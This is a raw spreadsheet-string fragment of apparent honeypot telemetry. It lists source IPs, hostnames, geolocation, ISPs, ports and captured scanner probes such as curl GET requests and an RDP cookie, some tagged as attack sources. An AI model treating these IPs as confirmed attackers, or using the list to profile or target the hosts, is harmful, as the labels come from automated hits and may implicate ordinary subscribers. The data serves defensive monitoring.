    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:5df4</t>
  </si>
  <si>
    <t>3cfe2629545722a939d67aff6b2f5f03</t>
  </si>
  <si>
    <t>220.134.152.45</t>
  </si>
  <si>
    <t>220-134-152-45.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;61285&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;38881&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:982d</t>
  </si>
  <si>
    <t>14c617b4e20166e0d28e0f6cdf2137e3</t>
  </si>
  <si>
    <t>117.206.187.250</t>
  </si>
  <si>
    <t>::ffff:75ce:bbfa</t>
  </si>
  <si>
    <t>5cb51fb7dc2b3069be8d1bc118eba7de</t>
  </si>
  <si>
    <t>103.174.62.222</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H36</t>
  </si>
  <si>
    <t>Riau Islands</t>
  </si>
  <si>
    <t>Tanjung Pinang</t>
  </si>
  <si>
    <t>1624863</t>
  </si>
  <si>
    <t>0.9166700000000001</t>
  </si>
  <si>
    <t>104.458</t>
  </si>
  <si>
    <t>147095</t>
  </si>
  <si>
    <t>PT Angkasa Bintan Cemerlang</t>
  </si>
  <si>
    <t>2021-10-07</t>
  </si>
  <si>
    <t>IDNIC-ABC-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.174.62.222,65297)}</t>
  </si>
  <si>
    <t>::ffff:67ae:3ede</t>
  </si>
  <si>
    <t>a8d748f4d021d9d904626d639022d765</t>
  </si>
  <si>
    <t>182.56.248.10</t>
  </si>
  <si>
    <t>::ffff:b638:f80a</t>
  </si>
  <si>
    <t>33a6aa1ec45e41dd13de57ea5281d966</t>
  </si>
  <si>
    <t>146.70.129.110</t>
  </si>
  <si>
    <t>64</t>
  </si>
  <si>
    <t>South Moravian</t>
  </si>
  <si>
    <t>Brno-venkov</t>
  </si>
  <si>
    <t>Ostopovice</t>
  </si>
  <si>
    <t>3068805</t>
  </si>
  <si>
    <t>49.161</t>
  </si>
  <si>
    <t>16.5455</t>
  </si>
  <si>
    <t>M247 Ltd Prague</t>
  </si>
  <si>
    <t>::ffff:9246:816e</t>
  </si>
  <si>
    <t>59547e210ae3e3b3dadc081c36b2d5fa</t>
  </si>
  <si>
    <t>59.182.150.80</t>
  </si>
  <si>
    <t>::ffff:3bb6:9650</t>
  </si>
  <si>
    <t>d8d5be5700baf569e3b09e30740a17ad</t>
  </si>
  <si>
    <t>80.178.228.193</t>
  </si>
  <si>
    <t>80.178.228.193.adsl.012.net.il&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H4&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H21</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;13115&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;20081&amp;&amp;NA</t>
  </si>
  <si>
    <t>Petah Tikva</t>
  </si>
  <si>
    <t>293918</t>
  </si>
  <si>
    <t>32.0887</t>
  </si>
  <si>
    <t>34.8569</t>
  </si>
  <si>
    <t>12400</t>
  </si>
  <si>
    <t>Partner Communications Ltd.</t>
  </si>
  <si>
    <t>Partner Communications</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:50b2:e4c1</t>
  </si>
  <si>
    <t>528cdfd6f9446b40630f68c4d19bef46</t>
  </si>
  <si>
    <t>220.134.63.96</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-134-63-96.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>23&amp;&amp;53073&amp;&amp;53099&amp;&amp;9100&amp;&amp;80&amp;&amp;52925&amp;&amp;52947&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;NA&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:3f60</t>
  </si>
  <si>
    <t>a3a0ac7bb04c31a9c4f69b3d4067cecc</t>
  </si>
  <si>
    <t>125.229.164.216</t>
  </si>
  <si>
    <t>125-229-164-216.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;43548&amp;&amp;37528&amp;&amp;55346&amp;&amp;3419&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:a4d8</t>
  </si>
  <si>
    <t>19d623ff14f0a8918c3ea32d69bf4ef1</t>
  </si>
  <si>
    <t>220.132.41.211</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-132-41-211.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;61660&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:29d3</t>
  </si>
  <si>
    <t>c2ac58dd7b1d3779ef3dd459b8a900b2</t>
  </si>
  <si>
    <t>101.108.75.115</t>
  </si>
  <si>
    <t>node-ewj.pool-101-108.dynamic.totinternet.net</t>
  </si>
  <si>
    <t>Phra Nakhon</t>
  </si>
  <si>
    <t>10128831</t>
  </si>
  <si>
    <t>13.7651</t>
  </si>
  <si>
    <t>100.499</t>
  </si>
  <si>
    <t>::ffff:656c:4b73</t>
  </si>
  <si>
    <t>7d074d78140038be6e02a4ce08a813ed</t>
  </si>
  <si>
    <t>123.21.68.80</t>
  </si>
  <si>
    <t>::ffff:7b15:4450</t>
  </si>
  <si>
    <t>271ebf80244fbfd621542a7644058b69</t>
  </si>
  <si>
    <t>125.229.23.90</t>
  </si>
  <si>
    <t>125-229-23-90.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>50193&amp;&amp;23&amp;&amp;80</t>
  </si>
  <si>
    <t>None&amp;&amp;login&amp;&amp;connection&amp;&amp;GET</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7de5:175a</t>
  </si>
  <si>
    <t>bbe3e38396d0558146ab14f9da4c94c7</t>
  </si>
  <si>
    <t>117.233.144.224</t>
  </si>
  <si>
    <t>::ffff:75e9:90e0</t>
  </si>
  <si>
    <t>d95d128da01ab31cf86d67f50abc0cec</t>
  </si>
  <si>
    <t>125.229.68.139</t>
  </si>
  <si>
    <t>125-229-68-139.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;53707&amp;&amp;80&amp;&amp;23&amp;&amp;51082&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7de5:448b</t>
  </si>
  <si>
    <t>9531e33eb1b5a2df934572b2ab40a7f6</t>
  </si>
  <si>
    <t>122.117.24.23</t>
  </si>
  <si>
    <t>122-117-24-23.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H19&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;36560&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:1817</t>
  </si>
  <si>
    <t>fd78de0a44be14a252b2a4e9253465d9</t>
  </si>
  <si>
    <t>103.77.241.41</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_RDP_H11</t>
  </si>
  <si>
    <t>5900&amp;&amp;3389&amp;&amp;54066&amp;&amp;65019&amp;&amp;59266&amp;&amp;64188&amp;&amp;52897&amp;&amp;63633&amp;&amp;58018&amp;&amp;52328&amp;&amp;57234&amp;&amp;51433&amp;&amp;50909&amp;&amp;61591&amp;&amp;55935&amp;&amp;56543&amp;&amp;54127&amp;&amp;59169&amp;&amp;64831&amp;&amp;53513&amp;&amp;64237&amp;&amp;58617&amp;&amp;63671&amp;&amp;64834&amp;&amp;53705&amp;&amp;64492&amp;&amp;58936&amp;&amp;64174&amp;&amp;58615&amp;&amp;56394&amp;&amp;61671&amp;&amp;50558&amp;&amp;56093&amp;&amp;61363&amp;&amp;55829&amp;&amp;50264&amp;&amp;50473&amp;&amp;61220&amp;&amp;55632&amp;&amp;50097&amp;&amp;60926&amp;&amp;55437&amp;&amp;49870&amp;&amp;60509&amp;&amp;54649&amp;&amp;49352&amp;&amp;60161&amp;&amp;65466&amp;&amp;54387&amp;&amp;55361&amp;&amp;49818&amp;&amp;60658&amp;&amp;55151&amp;&amp;49598&amp;&amp;60413&amp;&amp;54798&amp;&amp;60011&amp;&amp;65203&amp;&amp;64872&amp;&amp;59233&amp;&amp;53612&amp;&amp;58752&amp;&amp;64371&amp;&amp;63904&amp;&amp;51912&amp;&amp;62698&amp;&amp;57116&amp;&amp;51475&amp;&amp;62227&amp;&amp;50955&amp;&amp;62383&amp;&amp;56799&amp;&amp;51170&amp;&amp;61915&amp;&amp;60044&amp;&amp;54342&amp;&amp;65071&amp;&amp;59404&amp;&amp;53814&amp;&amp;61569&amp;&amp;50170&amp;&amp;60900&amp;&amp;60333&amp;&amp;53473&amp;&amp;61037&amp;&amp;55374&amp;&amp;50312&amp;&amp;49719&amp;&amp;54771&amp;&amp;65478&amp;&amp;54084&amp;&amp;64812&amp;&amp;59763&amp;&amp;59166&amp;&amp;53522&amp;&amp;60778&amp;&amp;55119&amp;&amp;49476&amp;&amp;60208&amp;&amp;54556&amp;&amp;59603&amp;&amp;65262&amp;&amp;64311&amp;&amp;53583&amp;&amp;58711&amp;&amp;63867&amp;&amp;52588&amp;&amp;58240&amp;&amp;52837&amp;&amp;58049&amp;&amp;52464&amp;&amp;63304&amp;&amp;57677&amp;&amp;52114&amp;&amp;58927&amp;&amp;63832&amp;&amp;58227&amp;&amp;52632&amp;&amp;57852&amp;&amp;63427&amp;&amp;63045&amp;&amp;52255&amp;&amp;57397&amp;&amp;62938&amp;&amp;51662&amp;&amp;62439&amp;&amp;56811&amp;&amp;61879&amp;&amp;56283&amp;&amp;51168&amp;&amp;61289&amp;&amp;50007&amp;&amp;60756&amp;&amp;49505&amp;&amp;55142&amp;&amp;60284&amp;&amp;54688&amp;&amp;65449&amp;&amp;59830&amp;&amp;54209&amp;&amp;64955&amp;&amp;53759&amp;&amp;64509&amp;&amp;53257</t>
  </si>
  <si>
    <t>140810</t>
  </si>
  <si>
    <t>Megacore Technology Company Limited</t>
  </si>
  <si>
    <t>HTSG</t>
  </si>
  <si>
    <t>Htsg High Technology Services and Media Joint Stock Company</t>
  </si>
  <si>
    <t>connection&amp;&amp;stshash&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_VNC:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:674d:f129</t>
  </si>
  <si>
    <t>high&amp;&amp;low&amp;&amp;medium</t>
  </si>
  <si>
    <t>7f4547fa246742a7c941c9d51be275b0</t>
  </si>
  <si>
    <t>120.56.103.10</t>
  </si>
  <si>
    <t>::ffff:7838:670a</t>
  </si>
  <si>
    <t>2b621c8863d93d8fae2b9b6c56ecd3ae</t>
  </si>
  <si>
    <t>120.59.181.110</t>
  </si>
  <si>
    <t>::ffff:783b:b56e</t>
  </si>
  <si>
    <t>fb114c577921546929e3e33d7d82ca22</t>
  </si>
  <si>
    <t>217.219.185.9</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;445&amp;&amp;48555</t>
  </si>
  <si>
    <t>Rasht (District 4)</t>
  </si>
  <si>
    <t>118743</t>
  </si>
  <si>
    <t>37.2436</t>
  </si>
  <si>
    <t>49.5776</t>
  </si>
  <si>
    <t>Islamic Azad University of Rasht</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (217.219.185.9,61766)}&amp;&amp;{Data_SMB:Incoming connection (217.219.185.9,62426)}&amp;&amp;{Data_SMB:Incoming connection (217.219.185.9,58723)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (217.219.185.9,60181)}&amp;&amp;{Data_SMB:Incoming connection (217.219.185.9,60614)}</t>
  </si>
  <si>
    <t>::ffff:d9db:b909</t>
  </si>
  <si>
    <t>bf6421bb7d5612b6d326d931dd068556</t>
  </si>
  <si>
    <t>170.233.196.52</t>
  </si>
  <si>
    <t>Tunápolis</t>
  </si>
  <si>
    <t>Iporã do Oeste</t>
  </si>
  <si>
    <t>3461088</t>
  </si>
  <si>
    <t>-26.988</t>
  </si>
  <si>
    <t>-53.5346</t>
  </si>
  <si>
    <t>265083</t>
  </si>
  <si>
    <t>AS265083</t>
  </si>
  <si>
    <t>UltraWeb Telecomunicações LTDA</t>
  </si>
  <si>
    <t>::ffff:aae9:c434</t>
  </si>
  <si>
    <t>9c6148a81793b0d2bcb5b5f4824cc648</t>
  </si>
  <si>
    <t>117.207.163.127</t>
  </si>
  <si>
    <t>::ffff:75cf:a37f</t>
  </si>
  <si>
    <t>1a70832f02780f24431e064ead61f364</t>
  </si>
  <si>
    <t>81.109.89.22</t>
  </si>
  <si>
    <t>cpc86064-nott19-2-0-cust277.12-2.cable.virginm.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Nottingham</t>
  </si>
  <si>
    <t>New Basford</t>
  </si>
  <si>
    <t>11863042</t>
  </si>
  <si>
    <t>52.9734</t>
  </si>
  <si>
    <t>-1.16564</t>
  </si>
  <si>
    <t>2002-06-14</t>
  </si>
  <si>
    <t>::ffff:516d:5916</t>
  </si>
  <si>
    <t>9c1a9203edfdd590aee86ade02c034c3</t>
  </si>
  <si>
    <t>43.252.60.232</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46</t>
  </si>
  <si>
    <t>::ffff:2bfc:3ce8</t>
  </si>
  <si>
    <t>150187309ddd10043e2514c6de36194e</t>
  </si>
  <si>
    <t>114.32.249.227</t>
  </si>
  <si>
    <t>114-32-249-227.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
